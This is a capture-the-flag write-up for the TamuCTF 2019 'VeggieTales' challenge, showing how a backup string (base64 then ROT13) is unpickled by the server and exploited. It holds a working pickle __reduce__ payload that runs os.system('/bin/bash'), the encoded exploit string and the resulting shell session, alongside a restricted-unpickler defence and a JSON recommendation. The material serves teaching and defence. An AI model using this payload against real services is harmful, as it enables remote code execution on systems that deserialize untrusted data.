TamuCTF 2019 - VeggieTales (pwn)

This challenge was a Pickle deserialization vulnerability. It was pretty trivial, but I lost too much time on the encoding of the backup string.


It's my favorite show to watch while practicing my python skills! I've seen episode 5 at least 13 times.
nc pwn.tamuctf.com 8448

ROFL ROFL ROFL

Once connected you get a menu with 4 options:

C:\Users\switch
? nc pwn.tamuctf.com 8448
Do you like VeggieTales??
1. Add an episode to your watched list
2. Print your watch list
3. Backup your watch list
4. Load your watch list

The backup and load options made me instantly think of a deserialization vulnerability. Moreover, the description says "I've seen episode 5 at least 13 times.", and the 5th episode is called "Dave and the Giant Pickle".


After adding at least one episode to your list, you can back it up as a base64-encoded string.

1. Add an episode to your watched list
2. Print your watch list
3. Backup your watch list
4. Load your watch list
1
1.  Wheres God When Im S-Scared?
2.  God Wants Me to Forgive Them!?!
3.  Are You My Neighbor?
4.  Rack, Shack and Benny
5.  Dave and the Giant Pickle
[...]
47. Noahs Ark
Enter an episode (by number) to add to your watched list: 1
episode added!
1. Add an episode to your watched list
2. Print your watch list
3. Backup your watch list
4. Load your watch list
3
Episode list backup string (Don't lose it!): tNAqpDOLVNNNNQRhVPOKnTIlMKZtE29xVSqbMJ4tFJ0tHl1GL2SlMJD/pDSuYt==

I ran some tests in order to identify the base64-encoded data: save, save2 and save3 are decoded backups of different episodes, and test is a {'test': 4} dict pickled with Python 2 (protocol 0) for comparison.

switch :: pain /mnt/hgfs/nextcloud/CTF/tamu2019/pwn/veggietales $ xxd save
00000000: b4d0 2aa4 338b 4cd3 4d35 0575 62f3 949c  ..*.3.L.M5.ub...
00000010: 9132 a36e 3a55 2135 2f34 6d23 64a5 a73c  .2.n:U!5/4m#d..<
00000020: a2a5 a44e 2c5e                           ...N,^
switch :: pain /mnt/hgfs/nextcloud/CTF/tamu2019/pwn/veggietales $ xxd save2
00000000: b4d0 2aa4 338b 4a33 4d35 00f6 62f3 8f30  ..*.3.J3M5..b..0
00000010: 94b5 a94c 6d2c 9e71 5541 1b30 538f 3092  ...Lm,.qUA.0S.0.
00000020: 34a4 34ae 62                             4.4.b
switch :: pain /mnt/hgfs/nextcloud/CTF/tamu2019/pwn/veggietales $ xxd save3
00000000: b4d0 2aa4 335b 24eb 4d34 d365 02fe 2d18  ..*.3[$.M4.e..-.
00000010: 9f72 5534 a130 f3b4 9d31 ed0f 3c9a 5512  .rU4.0...1..<.U.
00000020: 389c a124 348b 6c34 d34d 670a 6155 211b  8..$4.l4.Mg.aU!.
00000030: 3053 8aa3 6e71 30a5 b3a8 98ed 236c ba2c  0S..nq0.....#l.,
00000040: a5b1 553f 7355 1bae a774 4f30 5e         ..U?sU...tO0^
switch :: pain /mnt/hgfs/nextcloud/CTF/tamu2019/pwn/veggietales $ xxd test 
00000000: 2864 7030 0a53 2774 6573 7427 0a70 310a  (dp0.S'test'.p1.
00000010: 4934 0a73 2e                             I4.s.

I lost time here because I could not identify the saved data: it did not look like a Pickle object at all. Compare with test, which starts with readable opcodes and ends with the STOP opcode '.'; the three saves have neither a \x80 protocol header nor a trailing '.', just high-entropy bytes.


I tried XOR, subtraction and addition with 13 (they watched it 13 times, according to the description) but nothing led to a Pickle object. Then I had a revelation:

switch :: pain $ echo tNAqpDOLVNNNNQRhVPOKnTIlMKZtE29xVSqbMJ4tFJ0tHl1GL2SlMJD/pDSuYt== |  tr 'A-Za-z' 'N-ZA-Mn-za-m' | base64 -d | xxd
00000000: 8003 5d71 0058 2000 0000 312e 2020 5768  ..]q.X ...1.  Wh
00000010: 6572 6573 2047 6f64 2057 6865 6e20 496d  eres God When Im

It was a simple ROT13, but applied to the base64-encoded data (the decoded bytes start with \x80\x03, the protocol 3 header, followed by an empty list and the episode string). Knowing that, we just have to pickle our payload, base64-encode it, then ROT13 it!
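The same scheme worked through in Python 3, as an added example (this is not the writeup's xploit.py, and server.py was never shown, so it assumes the server pickles the watch list as a plain list of strings, base64-encodes then ROT13s it, and that the load option reverses that before calling pickle.loads). It decodes the backup string captured above, builds the same kind of __reduce__ payload, and shows the two checks the server was missing: a pickletools scan for global/call opcodes that never executes anything, and a RestrictedUnpickler whose find_class refuses every global. The function names (decode_backup, risky_opcodes, load_backup) and the RISKY opcode set are my own, not from the challenge.

```python
#!/usr/bin/env python3
"""Added example, not the original xploit.py: the VeggieTales backup format
worked through in Python 3, plus the check the server should have done
before calling pickle.loads() on user input.

Assumptions (server.py was never shown): the backup is pickle.dumps(list of
episode strings) -> base64 -> ROT13, and the load option reverses that and
calls pickle.loads() on the result."""
import base64
import codecs
import io
import os
import pickle
import pickletools

# Backup string captured from the challenge (the one shown in the writeup).
BACKUP = "tNAqpDOLVNNNNQRhVPOKnTIlMKZtE29xVSqbMJ4tFJ0tHl1GL2SlMJD/pDSuYt=="
# The payload string that xploit.py produces further down in the writeup.
WRITEUP_PAYLOAD = "L3Oip2y4PaA5p3EyoDcjZDbbHlpiLzyhY2Wup2taPaNlPaEjZjcFpQDXYtb="

# Opcodes that resolve a global or call something: every pickle RCE gadget
# needs at least one of these. A harmless list of strings needs none of them.
RISKY = {"GLOBAL", "STACK_GLOBAL", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX",
         "REDUCE", "BUILD"}


def decode_backup(s: str) -> bytes:
    """Undo the transport encoding: ROT13 first, then base64 (the order of
    the tr | base64 -d pipeline above)."""
    return base64.b64decode(codecs.decode(s, "rot_13"))


def encode_backup(obj) -> str:
    """Inverse of decode_backup: pickle -> base64 -> ROT13."""
    return codecs.encode(base64.b64encode(pickle.dumps(obj)).decode(), "rot_13")


class Exploit:
    """Same trick as xploit.py: __reduce__ makes the unpickler call
    os.system(cmd) while rebuilding the object."""

    def __init__(self, cmd: str):
        self.cmd = cmd

    def __reduce__(self):
        return (os.system, (self.cmd,))


def exploit_backup(cmd: str = "/bin/bash") -> str:
    """Build the malicious backup string. Protocol 0 keeps the pickle
    text-like, as the Python 2 cPickle output on this page."""
    raw = pickle.dumps(Exploit(cmd), protocol=0)
    return codecs.encode(base64.b64encode(raw).decode(), "rot_13")


def risky_opcodes(data: bytes) -> list:
    """Walk the pickle with pickletools.genops (nothing is executed) and
    report which of the RISKY opcodes it contains."""
    return sorted({op.name for op, _, _ in pickletools.genops(data)} & RISKY)


class RestrictedUnpickler(pickle.Unpickler):
    """Refuses every global lookup, so the pickle can never resolve a
    function such as posix.system, whatever it asks for."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")


def load_backup(s: str):
    """What the server should do: decode, then unpickle with globals disabled.
    Returns the watch list, or None when the pickle tried to load a global."""
    try:
        return RestrictedUnpickler(io.BytesIO(decode_backup(s))).load()
    except pickle.UnpicklingError:
        return None


if __name__ == "__main__":
    pickletools.dis(decode_backup(BACKUP))      # EMPTY_LIST, BINUNICODE, APPEND, STOP
    print("legit backup   :", load_backup(BACKUP))
    payload = exploit_backup("id")
    print("exploit string :", payload)
    print("risky opcodes  :", risky_opcodes(decode_backup(payload)))
    print("restricted load:", load_backup(payload))   # None: os.system never ran
```

Blocking find_class stops this gadget cold (posix.system is never resolved, so nothing runs), and the opcode scan is a cheap way to log or reject suspicious backups before touching them. For something as simple as a list of episode names, though, the real fix is not to pickle at all: json.dumps/json.loads carries the same data and has no code execution path.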


I already used this payload in the article about the Codegate quals Impel Down challenge, so I will use it again :)

switch :: pain /mnt/hgfs/nextcloud/CTF/tamu2019/pwn/veggietales $ cat xploit.py 

#!/usr/bin/python
#encoding:utf-8
# Python 2: cPickle.dumps() with the default protocol 0 gives the text pickle
# (cposix\nsystem ... R ...) that the server unpickles.
import os
import cPickle

class Exploit(object):
	# __reduce__ tells the unpickler how to rebuild the object: by calling
	# os.system('/bin/bash'). The call happens inside pickle.loads() on the server.
	def __reduce__(self):
		return (os.system, ('/bin/bash',))

# print appends a newline; harmless, the unpickler stops at the STOP opcode ('.').
print cPickle.dumps(Exploit()) 

switch :: pain /mnt/hgfs/nextcloud/CTF/tamu2019/pwn/veggietales $ python xploit.py | base64 | tr 'A-Za-z' 'N-ZA-Mn-za-m'
L3Oip2y4PaA5p3EyoDcjZDbbHlpiLzyhY2Wup2taPaNlPaEjZjcFpQDXYtb=

Then we just have to load it with option 4 (Load your watch list); the shell pops as soon as the server unpickles it:

switch :: pain /mnt/hgfs/nextcloud/CTF/tamu2019/pwn/veggietales $ nc pwn.tamuctf.com 8448
Do you like VeggieTales??
1. Add an episode to your watched list
2. Print your watch list
3. Backup your watch list
4. Load your watch list
4
Load your backed up list here: L3Oip2y4PaA5p3EyoDcjZDbbHlpiLzyhY2Wup2taPaNlPaEjZjcFpQDXYtb=
ls
flag.txt
server.py
cat flag.txt
gigem{d0nt_7rust_th3_g1ant_pick1e}